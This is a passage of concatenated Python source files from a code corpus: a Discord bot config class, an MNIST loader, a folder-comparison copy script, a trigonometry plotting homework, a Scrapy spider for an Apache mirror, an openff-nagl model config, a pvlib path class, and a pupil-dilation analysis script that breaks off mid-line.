e = discord.Embed(color=0xD81B60)\n e.title = f'{self.__class__.__name__}'\n return e\n\n\n async def handle_command(self, ctx: Context, *args):\n args = list(args)\n if not any(args):\n await self._send_params(ctx)\n\n else:\n param = args.pop(0)\n try:\n if param not in self.type_hints:\n raise BadArgument(f'`{param}` is not a valid config option')\n\n hint = self.type_hints[param]\n origin = typing.get_origin(hint)\n\n if origin is list:\n action = args.pop(0).strip()\n hint = typing.get_args(self.type_hints[param])[0]\n\n singlearg = await self._convert_argument(ctx, hint, args, param)\n\n arg = getattr(self, param)\n\n if action == 'add':\n if not singlearg in arg:\n arg.append(singlearg)\n\n elif action == 'remove':\n arg.remove(singlearg)\n\n else:\n raise BadArgument(f'Must use \\'add\\' or \\'remove\\' for List parameter {param}')\n\n else:\n arg = await self._convert_argument(ctx, hint, args, param)\n\n await self._update_config(param, arg)\n\n await ctx.send(embed=await self._single_param_embed(param))\n\n except BadArgument as e:\n await ctx.send(e)\n\n async def _single_param_embed(self, param):\n e = self._embed\n e.description = await self._render_param(param)\n return e\n\n async def _render_hint(self, param) -> str:\n hint = self.type_hints[param]\n origin = typing.get_origin(hint)\n if origin and issubclass(origin, Iterable):\n return f'**{param}** ({origin.__name__.capitalize()}[{typing.get_args(hint)[0].__name__}]):\\n'\n\n else:\n return f'**{param}** ({hint.__name__}) = '\n\n def _render_val(self, val) -> str:\n if isinstance(val, (discord.abc.Messageable, discord.Role)):\n return val.mention\n elif isinstance(val, discord.Message):\n return f'[Message]({val.jump_url})'\n else:\n return val\n\n async def _render_arg(self, param) -> str:\n arg = getattr(self, param)\n\n if inspect.iscoroutine(arg):\n arg = await arg\n\n if isinstance(arg, Iterable):\n return '\\n'.join([f'- {self._render_val(s)}' for s in arg])\n else:\n return self._render_val(arg)\n\n async def _render_param(self, param):\n return await self._render_hint(param) \\\n + str(await self._render_arg(param)) \\\n + '\\n'\n\n async def _send_params(self, ctx):\n e = self._embed\n e.title += ' \\N{WHITE HEAVY CHECK MARK}' if self.check else ' \\N{CROSS MARK}'\n e.description = ''\n\n for param, hint in self.type_hints.items():\n e.description += await self._render_param(param)\n\n e.description += ''\n await ctx.send(embed=e)\n\n async def _convert_argument(self, ctx, converter, args, param) -> Any:\n if converter is discord.Message:\n converter = discord.TextChannel\n\n if converter is str:\n args = ' '.join(args)\n else:\n args = args[0]\n\n converted = await ctx.command._actual_conversion(ctx, converter, args, param)\n\n if converter is discord.Message:\n return await converted.fetch_message(args[1])\n\n return converted\n\n def _make_key(self, param, hint):\n if issubclass(hint, discord.abc.Snowflake):\n return f'{param}_id'\n\n return f'{param}'\n\n def _serialize_param(self, param) -> dict:\n hint = self.type_hints[param]\n\n if typing.get_origin(hint) is list:\n hint = typing.get_args(hint)[0]\n\n return f'{self._make_key(param, hint)}s'\n\n return self._make_key(param, hint)\n\n def _make_val(self, val):\n if isinstance(val, discord.Message):\n return f'{val.channel.id}:{val.id}'\n\n if issubclass(type(val), discord.abc.Snowflake):\n return val.id\n\n return val\n\n def _serialize_arg(self, val):\n if isinstance(val, list):\n return [self._make_val(v) for v in val]\n\n return self._make_val(val)\n\n async def _update_config(self, param, arg) -> NoReturn:\n data = {f'{self.name}.{self._serialize_param(param)}': self._serialize_arg(arg)}\n\n doc = await self._bot.db.guild_config.find_one_and_update(\n {\"id\": self._guild_id},\n {\"$set\": data},\n upsert = True,\n return_document = ReturnDocument.AFTER\n )\n\n self.from_doc(doc)\n\n\n @classmethod\n async def from_db(cls, guild_id, bot):\n self = cls()\n self._guild_id = guild_id\n self._bot = bot\n\n doc = await bot.guild_config(guild_id)\n self.from_doc(doc)\n\n log.debug(f'{self.__class__.__name__} - Loaded guild \"{self.guild.name}\" ({self.guild.id}) config from db')\n\n return self\n\n\n def from_doc(self, doc: Dict) -> NoReturn:\n doc = doc.get(self.name, {})\n for param, hint in self.type_hints.items():\n param_id = self._serialize_param(param)\n\n if hasattr(self, param):\n default = getattr(self, param)\n elif typing.get_origin(hint) is list:\n default = []\n else:\n default = None\n\n arg = doc.get(param_id, default)\n\n setattr(self, param_id, arg)\n\n\n def __repr__(self):\n return f'<{self.__class__.__name__} {\" \".join([f\"{p}={getattr(self, p)}\" for p, h in self.type_hints.items()])}>'\n\n @property\n @abstractmethod\n def check(self):\n return self.enabled\n","sub_path":"cogs/utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":7650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"627356528","text":"from tensorflow.keras.datasets import mnist\nimport numpy as np\n\nclass DataLoader:\n def load(self, is_reshape=True, is_one_hot=False):\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n # convert\n x_train = self._normalize(x_train)\n x_test = self._normalize(x_test)\n if is_reshape:\n x_train = x_train.reshape(x_train.shape[0], -1)\n x_test = x_test.reshape(x_test.shape[0], -1)\n if is_one_hot:\n y_train = self._one_hot(y_train)\n y_test = self._one_hot(y_test)\n \n return (x_train, y_train), (x_test, y_test)\n\n def _one_hot(self, y_):\n one_hot = np.array([[int(i == y) for i in range(10)] for y in y_], dtype=float)\n return one_hot\n \n def _normalize(self, x_):\n return x_ / 255.0\n\n\n","sub_path":"mnist/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"542994355","text":"'''\r\nScript to compare files in two folders and copy those which are not overlapping.\r\n'''\r\nimport os\r\nimport shutil\r\nsource = \"Source Path\"\r\nfdir1 = os.listdir(\"folder1\")\r\nfdir2 = os.listdir(\"folder2\")\r\ndiff = list(set(fdir2) - set(fdir1))\r\nfor file in diff:\r\n shutil.copy(os.path.join(source, file), \"Destination Path\")\r\n","sub_path":"FileCompare.py","file_name":"FileCompare.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"247888445","text":"# -*- coding: utf-8 -*-\n\n'''\nName: Poojan Gajera\nStevens ID: 10432734\nCourse: FE 595\nHW: 01\nTitle: Python Refresher\n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Taking values from 0 to 360 for the cycle of sine/cosine.\nperiod = np.arange(0,2*np.pi,0.01)\n\n# Sine, Cosine and tangent Graph\nsine = np.sin(period )\ncosine = np.cos(period )\ntan = np.tan(period)\n\n#plotting sin and cosine on the same axis\nplt.plot(period,sine,period,cosine,period,tan)\n\n##creating legends\nplt.subplot().legend(['Sine','Cosine','Tangent'])\n\nplt.subplot().axhline(y=0, color='k')\nplt.subplot().axvline(x=0, color='k')\nplt.savefig(\"graph.png\")\nplt.show()\n","sub_path":"10432734_HW_1_FE_595.py","file_name":"10432734_HW_1_FE_595.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"191831243","text":"#!/usr/bin/python\n#coding=utf-8\n# @hequan\n\nfrom scrapy.spiders import Spider, Rule\nfrom scrapy.selector import Selector\nfrom scrapy.linkextractors import LinkExtractor\nimport re\nimport requests\nfrom scrapy.spiders import CrawlSpider\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\n\nfrom opensource_spider.items import OpensourceSpiderItem\n\nclass opensource_httpd_spider(CrawlSpider):\n # 爬虫的识别名称,必须是唯一的,在不同的爬虫中你必须定义不同的名字\n name = \"httpd_spider\" # 设置爬虫名称\n\n # 搜索的域名范围,也就是爬虫的约束区域,规定爬虫只爬取这个域名下的网页\n # http://mirrors.aliyun.com/apache/httpd/\n allowed_domains = [\"mirrors.aliyun.com\"] # 设置允许的域名\n\n # 爬取的url列表,爬虫从这里开始抓取数据,所以,第一次下载的数据将会从这些urls开始,其他子url将会从这些起始url中继承性生成\n start_urls = [\n 'http://mirrors.aliyun.com/apache/httpd/',\n ]\n\n # 解析的方法,调用的时候传入从每一个url传回的response对象作为唯一参数,负责解析并获取抓取的数据(解析为item),跟踪更多的url\n def parse(self, response):\n sel = Selector(response)\n items = []\n lvs_lists = sel.xpath('//a/@href').extract()\n for v in lvs_lists:\n if v == '../' or v == 'tmp/' or v == 'Name' or v == 'Last modified' or v == 'Description' or v == 'Parent Directory' or v == 'ChangeLog' or v == 'Size':\n continue\n\n item = OpensourceSpiderItem()\n item['orginname'] = v\n item['downurl'] = response.url + v\n item['filesize'] = 0\n items.append(item)\n\n return items\n\n\n","sub_path":"opensource_spider/spiders/opensource_httpd_spider.py","file_name":"opensource_httpd_spider.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"497990757","text":"\nimport pathlib\nimport typing\n\nfrom openff.nagl._base.base import ImmutableModel\nfrom openff.nagl.nn.gcn._base import _GCNStackMeta\nfrom openff.nagl.nn.activation import ActivationFunction\nfrom openff.nagl.features.atoms import DiscriminatedAtomFeatureType\nfrom openff.nagl.features.bonds import DiscriminatedBondFeatureType\nfrom openff.nagl.utils._types import FromYamlMixin\n\nAggregatorType = typing.Literal[\"mean\", \"gcn\", \"pool\", \"lstm\", \"sum\"]\nPostprocessType = typing.Literal[\"readout\", \"compute_partial_charges\", \"regularized_compute_partial_charges\"]\n\ntry:\n from pydantic.v1 import Field, validator\nexcept ImportError:\n from pydantic import Field, validator\n\nclass BaseLayer(ImmutableModel):\n \"\"\"Base class for single layer in the neural network\"\"\"\n hidden_feature_size: int = Field(\n description=(\n \"The feature sizes to use for each hidden layer. \"\n \"Each hidden layer will have the shape \"\n \"`n_atoms` x `hidden_feature_sizes`.\"\n )\n )\n activation_function: ActivationFunction = Field(\n description=\"The activation function to apply for each layer\"\n )\n dropout: float = Field(\n default=0.0,\n description=\"The dropout to apply after each layer\"\n )\n\n @validator(\"activation_function\", pre=True)\n def _validate_activation_function(cls, v):\n return ActivationFunction._get_class(v)\n\n\nclass ConvolutionLayer(BaseLayer):\n \"\"\"Configuration for a single convolution layer\"\"\"\n aggregator_type: AggregatorType = Field(\n default=None,\n description=\"The aggregator function to apply after each convolution\"\n )\n\n\nclass ForwardLayer(BaseLayer):\n \"\"\"Configuration for a single feedforward layer\"\"\"\n\n\nclass ConvolutionModule(ImmutableModel):\n architecture:typing.Literal[\"SAGEConv\", \"GINConv\"] = Field(\n description=\"GCN architecture to use\"\n )\n layers: typing.List[ConvolutionLayer] = Field(\n description=\"Configuration for each layer\"\n )\n\n\nclass ReadoutModule(ImmutableModel):\n pooling: typing.Literal[\"atoms\", \"bonds\"]\n layers: typing.List[ForwardLayer] = Field(\n description=\"Configuration for each layer\"\n )\n postprocess: typing.Optional[PostprocessType] = Field(\n description=\"Optional post-processing layer for prediction\"\n )\n\n # @validator(\"postprocess\", pre=True)\n # def _validate_postprocess(cls, v):\n # from openff.nagl.nn.postprocess import _PostprocessLayerMeta\n # if v is None:\n # return None\n # return _PostprocessLayerMeta._get_object(v)\n\n\nclass ModelConfig(ImmutableModel, FromYamlMixin):\n version: typing.Literal[\"0.1\"]\n atom_features: typing.List[DiscriminatedAtomFeatureType] = Field(\n description=\"Atom features to use\"\n )\n bond_features: typing.List[DiscriminatedBondFeatureType] = Field(\n description=(\n \"Bond features to use. \"\n \"Not all architectures support bond features\"\n )\n )\n convolution: ConvolutionModule = Field(\n description=\"Convolution config to pass molecular graph through\"\n )\n readouts: typing.Dict[str, ReadoutModule] = Field(\n description=\"Readout configs to map convolution representation to output\"\n )\n\n # @validator(\"atom_features\", \"bond_features\", pre=True)\n # def _validate_atom_features(cls, v, field):\n # if isinstance(v, dict):\n # v = list(v.items())\n # all_v = []\n # for item in v:\n # if isinstance(item, dict):\n # all_v.extend(list(item.items()))\n # elif isinstance(item, (str, field.type_, type(field.type_))):\n # all_v.append((item, {}))\n # else:\n # all_v.append(item)\n\n # instantiated = []\n # for klass, args in all_v:\n # if isinstance(klass, (AtomFeature, BondFeature)):\n # instantiated.append(klass)\n # else:\n # klass = type(field.type_)._get_class(klass)\n # if not isinstance(args, dict):\n # item = klass._with_args(args)\n # else:\n # item = klass(**args)\n # instantiated.append(item)\n # return instantiated\n \n def to_simple_dict(self):\n \"\"\"\n Create a simple dictionary representation of the model config\n\n This simplifies the representation of atom and bond features\n \"\"\"\n dct = self.dict()\n dct[\"atom_features\"] = tuple(\n [\n {f.feature_name: f.dict(exclude={\"feature_name\"})}\n for f in self.atom_features\n ]\n )\n\n dct[\"bond_features\"] = tuple(\n [\n {f.feature_name: f.dict(exclude={\"feature_name\"})}\n for f in self.bond_features\n ]\n )\n new_dict = dict(dct)\n for k, v in dct.items():\n if isinstance(v, pathlib.Path):\n v = str(v.resolve())\n new_dict[k] = v\n return new_dict\n \n @property\n def n_atom_features(self) -> int:\n \"\"\"The number of features used to represent an atom\"\"\"\n lengths = [len(feature) for feature in self.atom_features]\n n_features = sum(lengths)\n return n_features","sub_path":"openff/nagl/config/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"396833070","text":"from __future__ import annotations\nfrom typing import List, Generator, Union\nfrom datetime import datetime, timedelta\nimport pvlib as pv\nimport pandas as pd\nimport dataclasses\nimport numpy as np\nimport abc\n\n\n@dataclasses.dataclass()\nclass Path:\n points: List[pv.location.Location]\n timestamps: List[Union[pd.Timestamp, datetime]]\n\n @classmethod\n @abc.abstractmethod\n def create(cls, *args, **kwargs) -> LinearPath:\n pass\n\n @property\n def lats_lons(self) -> (List[float], List[float]):\n lats = [point.latitude for point in self.points]\n lons = [point.longitude for point in self.points]\n\n return lats, lons\n\n def __iter__(self) -> Generator[(pd.Timestamp, pv.location.Location), None, None]:\n yield from zip(self.timestamps, self.points)\n\n\nclass LinearPath(Path):\n @classmethod\n def create(cls, start_loc: pv.location.Location, end_loc: pv.location.Location,\n start_time: datetime, end_time: datetime,\n npoints=None) -> LinearPath:\n \"\"\"\n\n :param start_loc:\n :param end_loc:\n :param start_time:\n :param end_time:\n :param npoints: Number of points on the path. Defaults to None, for auto.\n :return:\n \"\"\"\n\n time_range = end_time - start_time\n\n if npoints is None: # automatically determine appropriate number of points\n npoints = int(time_range / timedelta(minutes=60))\n\n lats = np.linspace(start_loc.latitude, end_loc.latitude, npoints)\n\n lons = np.linspace(start_loc.longitude, end_loc.longitude, npoints)\n\n points = [pv.location.Location(lat, lon) for lat, lon in zip(lats, lons)]\n\n delta = time_range / npoints\n times = [start_time + (delta * n) for n in range(npoints)]\n\n return cls(points=points, timestamps=times)\n\n\n@dataclasses.dataclass()\nclass SegmentedPath(Path):\n segments: List[LinearPath] = dataclasses.field(default_factory=list)\n\n @classmethod\n def create(cls, start_loc: pv.location.Location, start_time: datetime) -> SegmentedPath:\n instance = cls([], [])\n instance.points = [start_loc]\n instance.timestamps = [start_time]\n return instance\n\n def append_point(self, loc: pv.location.Location, time: datetime, npoints=None):\n previous_loc = self.points[-1]\n previous_time = self.timestamps[-1]\n line = LinearPath.create(previous_loc, loc, previous_time, time, npoints=npoints)\n self.points.extend(line.points[1:])\n self.timestamps.extend(line.timestamps[1:])\n self.segments.append(line)\n\n","sub_path":"gui_and_analytics/analytics/location/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"533228489","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import stats\nfrom jaratoolbox import loadbehavior\nimport os\nimport facemapanalysis as fmap\nimport sys\n\ndef onset_values(signalArray): \n\n '''\n Helps to find onset start values of the sync singal in any given array: \n Args: \n SignalArray (np.array) = array that contains data of the sync signal\n Returns:\n onsetStartValues (np.array) = an array of the indices containing the start onset values of the sync signal.\n ''' \n firstIndexValue = 0 \n lastIndexValue = len(signalArray)-1 \n stepNumber = 2\n startIndicesValues = range(firstIndexValue, lastIndexValue, stepNumber)\n startIndicesVec = np.array(startIndicesValues)\n onsetStartValues = np.take(signalArray, startIndicesVec)\n return (onsetStartValues)\n \ndef eventlocked_signal(timeVec, signal, eventOnsetTimes, windowTimeRange):\n '''\n Make array of signal traces locked to an event.\n Args:\n timeVec (np.array): time of each sample in the signal.\n signal (np.array): samples of the signal to process.\n eventOnsetTimes (np.array): time of each event.\n windowTimeRange (list or np.array): 2-element array defining range of window to extract.\n Returns: \n windowTimeVec (np.array): time of each sample in the window w.r.t. the event.\n lockedSignal (np.array): extracted windows of signal aligned to event. Size (nSamples,nEvents)\n '''\n if (eventOnsetTimes[0] + windowTimeRange[0]) < timeVec[0]:\n raise ValueError('Your first window falls outside the recorded data.')\n if (eventOnsetTimes[-1] + windowTimeRange[-1]) > timeVec[-1]:\n raise ValueError('Your last window falls outside the recorded data.')\n samplingRate = 1/(timeVec[1]-timeVec[0])\n windowSampleRange = samplingRate*np.array(windowTimeRange) # units: frames\n windowSampleVec = np.arange(*windowSampleRange, dtype=int) # units: frames\n windowTimeVec = windowSampleVec/samplingRate # Units: time\n nSamples = len(windowTimeVec) # time samples / trial\n nTrials = len(eventOnsetTimes) # number of times the sync light went off\n lockedSignal = np.empty((nSamples,nTrials))\n for inde,eventTime in enumerate(eventOnsetTimes):\n eventSample = np.searchsorted(timeVec, eventTime) # eventSample = index at which the synch turns on\n thiswin = windowSampleVec + eventSample # indexes of window\n lockedSignal[:,inde] = signal[thiswin]\n return (windowTimeVec, lockedSignal)\n\n\ndef find_valid_windows(timeVec, eventOnsetTimes, windowTimeRange):\n \"\"\"\n Find windows that lie within the timeVec.\n Args:\n timeVec (np.array): time of each sample in the signal.\n eventOnsetTimes (np.array): time of each event.\n windowTimeRange (list or np.array): 2-element array defining range of window to extract.\n Returns: \n validWindows (np.array): array of booleans that is True if the window falls within.\n\n \"\"\"\n return (validWindows)\n\n\n\ndef eventlocked_signalold(timeVec, signal, eventOnsetTimes, windowTimeRange):\n '''\n Make array of signal traces locked to an event.\n Args:\n timeVec (np.array): time of each sample in the signal.\n signal (np.array): samples of the signal to process.\n eventOnsetTimes (np.array): time of each event.\n windowTimeRange (list or np.array): 2-element array defining range of window to extract.\n Returns: \n windowTimeVec (np.array): time of each sample in the window w.r.t. the event.\n lockedSignal (np.array): extracted windows of signal aligned to event. Size (nSamples,nEvents)\n '''\n samplingRate = 1/(timeVec[1]-timeVec[0])\n windowSampleRange = samplingRate*np.array(windowTimeRange) # units: frames\n windowSampleVec = np.arange(*windowSampleRange, dtype=int) # units: frames\n windowTimeVec = windowSampleVec/samplingRate # Units: time\n nSamples = len(windowTimeVec) # time samples / trial\n nTrials = len(eventOnsetTimes) # number of times the sync light went off\n lockedSignal = np.empty((nSamples,nTrials))\n discards = [] #DB ADDED\n for inde,eventTime in enumerate(eventOnsetTimes):\n eventSample = np.searchsorted(timeVec, eventTime) # eventSample = index at which the synch turns on\n thiswin = windowSampleVec + eventSample # indexes of window\n if np.logical_and(np.min(thiswin) > 0, np.max(thiswin) < len(signal)): # DB ADDED\n lockedSignal[:,inde] = signal[thiswin] # DB ADDED\n else: # DB ADDED\n discards.append(inde) # DB ADDED\n lockedSignal_trim = np.delete(lockedSignal,discards,1) # DB ADDED\n return (windowTimeVec, lockedSignal_trim)\n \ndef find_prepost_values(timeArray, dataArray, preLimDown, preLimUp, postLimDown, postLimUp): \n \n ''' \n Obtain pupil data before and after stimulus \n Args: \n timeArray (np.array): array of the time window to evaluate pupil area obtained from event_locked \n dataArray (np.array): array of the pupil data obtained from event_locked function \n preLimDown (int or float): first number of the time interval to evaluate before stimulus onset \n preLimUp (int or float): second number of the time interval to evaluate before stimulus onset\n postLimDown (int or float): first number of the time interval to evaluate after stimulus onset \n postLimUp (int or float): second number of the time interval to evaluate after stimulus onset \n Returns: \n preData (np.array): array with the pupil data before stimulus \n postData (np.array): array with the pupil data after stimulus \n ''' \n preBool = np.logical_and(preLimDown <= timeArray, timeArray < preLimUp) \n postBool = np.logical_and(postLimDown <= timeArray, timeArray < postLimUp) \n preValuesIndices = np.argwhere(preBool == True) \n postValuesIndices = np.argwhere(postBool == True) \n preProcessedPreValues = dataArray[preValuesIndices] \n preProcessedPostValues = dataArray[postValuesIndices] \n preData = preProcessedPreValues.reshape(preValuesIndices.shape[0], dataArray.shape[1]) \n postData = preProcessedPostValues.reshape(postValuesIndices.shape[0], dataArray.shape[1]) \n return(preData, postData)\n\ndef freqs_and_meanParea(freqsArray, meanPareaVariable, freq1, freq2, freq3, freq4, freq5): \n '''\n Creates arrays containing the pupil area for each tested frequency\n Args:\n freqsArray (np.array): array containing the tested frequencies\n meanPareaVariable (np.array): array containing the average pupil size\n freq1..5 (int): frequencies tested\n \n returns:\n arrValues1..5 (np.array): one array per frequency tested (freq1..5) that contains the pupil size for the given frequency\n '''\n \n indicesFreq1 = np.argwhere(freq1 == freqsArray) \n indicesFreq2 = np.argwhere(freq2 == freqsArray)\n indicesFreq3 = np.argwhere(freq3 == freqsArray) \n indicesFreq4 = np.argwhere(freq4 == freqsArray) \n indicesFreq5 = np.argwhere(freq5 == freqsArray) \n newIndexArr1 = np.take(meanPareaVariable, indicesFreq1) \n newIndexArr2 = np.take(meanPareaVariable, indicesFreq2) \n newIndexArr3 = np.take(meanPareaVariable, indicesFreq3) \n newIndexArr4 = np.take(meanPareaVariable, indicesFreq4) \n newIndexArr5 = np.take(meanPareaVariable, indicesFreq5)\n arrValues1 = newIndexArr1.flatten()\n arrValues2 = newIndexArr2.flatten() \n arrValues3 = newIndexArr3.flatten() \n arrValues4 = newIndexArr4.flatten() \n arrValues5 = newIndexArr5.flatten()\n return(arrValues1, arrValues2, arrValues3, arrValues4, arrValues5)\n\n\ndef normalize_data(pupilArea, valuesToNormalize): \n minVal = np.amin(pupilArea) \n maxVal = np.amax(pupilArea) \n rangeValues = maxVal - minVal \n listData = [] \n for i in valuesToNormalize: \n substractMin = i - minVal \n newData = substractMin/rangeValues\n listData.append(newData) \n normalizedData = np.asarray(listData) \n return(normalizedData)\n\n \ndef comparison_plot(time, valuesData1, pVal): \n ''' \n Creates 1 figure with 3 plots \n Args: \n time = vector values for x axis \n valuesData1 (np.array) = vector values for y axis of the first plot \n valuesData2 (np.array)= vector values for y axis of the second plot\n valuesData3 (np.array)= vector values for y axis of the third plot\n returns: \n plt.show() = 1 figure with 3 plots using the input data \n ''' \n labelsSize = 16\n fig, subplt = plt.subplots(1,1)\n fig.set_size_inches(9.5, 7.5, forward = True)\n sp = np.round(pVal, decimals=17)\n label1 = filename,'pval:',sp\n \n subplt.plot(time, valuesData1, color = 'g', label = label1, linewidth = 4)\n\n subplt.set_xlabel('Time (s)', fontsize = labelsSize)\n subplt.set_ylabel('Pupil Area', fontsize = labelsSize)\n subplt.set_title('Pupil behavior: ' + filename, fontsize = labelsSize)\n plt.suptitle('Mouse = pure013. Data Collected 2022-07-01.', fontsize = labelsSize)\n plt.grid(b = True)\n #plt.ylim([550, 650])\n plt.xticks(fontsize = labelsSize)\n plt.yticks(fontsize = labelsSize)\n# plt.legend()\n #plt.legend(prop ={\"size\":10}, bbox_to_anchor=(1.0, 0.8))\n #plt.savefig('comparisonPure004Plot', format = 'pdf', dpi = 50)\n plt.show() \n return(plt.show())\n \ndef barScat_plots(firstPlotMeanValues1, firstPlotMeanValues2, xlabel1, xlabel2, firstPlotStdData1, firstPlotStdData2, pVal):\n '''\n Plot bar plots\n Args:\n MeanValues (int or float): number representing the average of the data to plot\n xlabel1 (string): name of the first condition to compare\n xlabel2 (string): name of the second condition to compare\n StdData (np.array): values to calculate the standard deviation from\n pVal (float or int): p-value for each one of the animals\n Returns:\n plt.show(): three bar plots within one figure\n '''\n barLabelsFontSize = 14\n meanPreSignal1 = firstPlotMeanValues1.mean(axis = 0) \n meanPostSignal1 = firstPlotMeanValues2.mean(axis = 0)\n preSignalStd1 = np.std(firstPlotStdData1) \n postSignalStd1 = np.std(firstPlotStdData2) \n barMeanValues1 = [meanPreSignal1, meanPostSignal1] \n stdErrors1 = [preSignalStd1, postSignalStd1] \n shortPval1 = np.round(pVal, decimals=3)\n pValue1 = 'P-value:', shortPval1\n dataPlot1 = [firstPlotMeanValues1, firstPlotMeanValues2] \n \n fig, barPlots = plt.subplots(1,1, constrained_layout = True, sharex = True, sharey = True)\n fig.set_size_inches(9.5, 7.5) \n barPlots.bar(xlabels, barMeanValues1, yerr = stdErrors1, color = 'g', label = pValue1) \n barPlots.errorbar(xlabels, barMeanValues1, yerr = stdErrors1, fmt='none', capsize=5, alpha=0.5, ecolor = 'black') \n barPlots.set_title(filename, fontsize = barLabelsFontSize)\n barPlots.set_ylabel('Pupil area', fontsize = barLabelsFontSize)\n barPlots.tick_params(axis='x', labelsize=barLabelsFontSize)\n #plotcolors = firstPlotMeanValues1 - firstPlotMeanValues2\n barPlots.plot(xlabels, dataPlot1, marker = 'o', c = 'k', alpha = 0.3, linewidth = 1)\n barPlots.legend(prop ={\"size\":10})\n \n #plt.ylim(250, 800)\n plt.suptitle('pupil behavior across trials', fontsize = barLabelsFontSize)\n #plt.xlabel(\"common X\", loc = 'center')\n #plt.savefig(scatBarDict['savedName'], format = 'pdf', dpi =50)\n plt.show() \n return(plt.show())\n \ndef pupilDilation_time(timeData1, plotData1, pvalue):\n shortPval = np.round(pvalue, decimals = 6)\n lab = 'p-value', shortPval \n plt.plot(timeData1,plotData1, label = lab)\n plt.title('pure004_20220110_2Sounds: average pupil behavior') \n plt.ylabel('Pupil Area', fontsize = 13)\n plt.xlabel('Time(s)', fontsize = 13)\n plt.legend()\n plt.show() \n return(plt.show())\n\ndef PDR_kHz_plot(freqsArray, arrFreq1, arrFreq2, arrFreq3, arrFreq4, arrFreq5):\n labelsSize = 16\n fig, freqplt = plt.subplots(1, 1)\n fig.set_size_inches(9.5, 7.5, forward = True)\n label1 = filename\n \n meanPoint1 = arrFreq1.mean(axis = 0)\n meanPoint2 = arrFreq2.mean(axis = 0) \n meanPoint3 = arrFreq3.mean(axis = 0) \n meanPoint4 = arrFreq4.mean(axis = 0) \n meanPoint5 = arrFreq5.mean(axis = 0) \n valuesPlot = [meanPoint1, meanPoint2, meanPoint3, meanPoint4, meanPoint5]\n \n freqplt.plot(freqsArray, valuesPlot, marker = 'o')\n freqplt.set_title('Pupil size for 5 different frequencies: pure011_20220331', fontsize = labelsSize)\n freqplt.set_ylabel('Mean pupil Area', fontsize = labelsSize)\n freqplt.set_xlabel('Frequencies (kHz)', fontsize = labelsSize)\n plt.grid(b = True)\n plt.xticks(fontsize = labelsSize)\n plt.yticks(fontsize = labelsSize)\n plt.show() \n return(plt.show())\n# ---------------------------------------------------------------------------------------------------------------\n \n \n \n#--- loading data ---\nfileloc = '/home/jarauser/Desktop/danny_datacollection/dbtest3_pure013_2022-07-01'\nfilename = 'pure013_detectiongonogo_20220701a_dbtest3_proc.npy'\nproc = fmap.load_data(os.path.join(fileloc, filename), runchecks=False)\n\n#--- obtain pupil data ---\npArea = fmap.extract_pupil(proc)\n\n#---calculate number of frames, frame rate, and time vector---\nnframes = len(pArea) # Number of frames.\nframeVec = np.arange(0, nframes, 1) # Vector of the total frames from the video.\nframerate = 30 # frame rate of video\ntimeVec = frameVec / framerate # Time Vector to calculate the length of the video.\n\n#--- obtain values where sync signal turns on ---\n_, syncOnsetValues, _, _ = fmap.extract_sync(proc)\ntimeOfSyncOnset = timeVec[syncOnsetValues] # Provides the time values in which the sync signal turns on.\n\n#--- Align trials to the event ---\ntimeRange = np.array([-0.5, 2.0]) # Range of time window\n# run function you're creating, to restrict trials to valid trials: timeofSyncOnset[bool] \nwindowTimeVec, windowed_signal = eventlocked_signal(timeVec, pArea, timeOfSyncOnset, timeRange)\n\n\n# TO SHOW SANTIAGO:\nprint('time of last sync light:')\nprint(timeOfSyncOnset[-1])\nprint('total time of recording:')\nprint(np.max(timeVec))\nprint('total number of sounds played (times sync light blinked):')\nprint(syncOnsetValues.shape)\nprint('total number of trials included in the analysis:')\nprint(windowed_signal.shape[1])\n\n\n#sys.exit() \n\n#--- Obtain pupil pre and post stimulus values, and average size ---\n#find_prepost_values(timeArray, dataArray, preLimDown, preLimUp, postLimDown, postLimUp)\npreSignal, postSignal = find_prepost_values(windowTimeVec, windowed_signal, -0.5, 0, 1.4, 2.0)\naveragePreSignal = preSignal.mean(axis = 0)\naveragePostSignal = postSignal.mean(axis = 0)\ndataToPlot = [averagePreSignal, averagePostSignal]\nxlabels = ['Pre signal', 'Post signal']\n\n#--- Wilcoxon test to obtain statistics ---\nwstat, pval = stats.wilcoxon(averagePreSignal, averagePostSignal)\nprint('Wilcoxon value config14_1', wstat,',', 'P-value config14_1', pval)\n\n#--- Defining the correct time range for pupil's relaxation (dilation) --- DB: SEEMS TO BE FOR PLOTTING, MAYBE WE SHOULD RENAME.\ntimeRangeForPupilDilation = np.array([-12, 12])\n#def eventlocked_signal(timeVec, signal, eventOnsetTimes, windowTimeRange)\npupilDilationTimeWindowVec, pAreaDilated = eventlocked_signal(timeVec, pArea, timeOfSyncOnset, timeRangeForPupilDilation)\npAreaDilatedMean = pAreaDilated.mean(axis = 1)\n\n#--- Plotting the results ---\nOverLapPlots = comparison_plot(pupilDilationTimeWindowVec, pAreaDilatedMean, pval)\nscattBar = barScat_plots(averagePreSignal, averagePostSignal, 'pre stimulus onset', 'post stimulus onset', preSignal, postSignal, pval)\n\n#--- Finding and plotting pupil area corresponding to each tested frequency ---\n#freqValues1, freqValues2, freqValues3, freqValues4, freqValues5 = freqs_and_meanParea(freqs, averagePostSignal, 2000, 4000, 8000, 16000, 32000) \n#pAreaFreqPlot = PDR_kHz_plot(frequenciesTested, freqValues1, freqValues2, freqValues3, freqValues4, freqValues5)\n\nprint('Data averaged over ', 